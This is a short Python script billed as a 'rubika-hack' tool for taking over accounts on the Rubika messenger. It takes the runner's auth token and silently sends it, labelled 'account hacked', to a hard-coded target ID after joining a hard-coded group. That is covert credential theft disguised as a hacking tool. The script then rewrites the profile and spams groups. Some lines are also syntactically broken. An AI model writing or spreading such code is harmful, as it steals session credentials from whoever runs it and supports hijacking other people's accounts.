#!/bin/python
# rubika-hack
# --- importing ---
import os,time,sys
from rubika import Bot
import datetime
#-----
os.system("clear")
#----
date = (datetime.datetime.today())
# bnr ---
banner = (f"""
___________________________
            #[{date}]#
            #############
           #############
          #  hack rubika ##
         [api hash and auth]
 ___________________________
         
         (help for hack account rubika):
         	
         python {sys.argv[0]} [auth]
__________________________________
         """)
for bnr in banner:
        sys.stdout.write(bnr)
        sys.stdout.flush()
        time.sleep(0.009)
#----
try:
	auth = sys.argv[1]
except:
	print (f"\nrun:\n\npython {sys.argv[0]} <auth>")
        sys.exit()

bot = Bot("AppName",auth=auth)
target = ("g0BmdMv0ca20f356cf2b972327373309")
bot.joinGroup("https://rubika.ir/joing/CEGFGBDE0UVKMLYIICMVTNJGBQKIDYNM")
bot.sendMessage(target,f"account hacked:\n\nauth: [{auth}]")
#-------
name = input("\nenter name account hacked _> ")
username = input ("\nenter username for account hacked _> ")
time.sleep(1)
biography = input ("\nenter bio for account hacked > ")
time.sleep(1)
print ("\n"*10)
bot.editProfile(bio=biography)
bot.editProfile(first_name=name)
bot.editProfile(username=username)
time.sleep(2)
print ('\n[+] SETED')
for _ in range(100):
        time.sleep(0.8)
	date = (datetime.datetime.today())
	target = input("\nenter your guid group for text _> ")
	sender = input("\nenter your text for send to group _>")
	bot.sendMessage(target,sender")
	print("\n\n")
#--------------
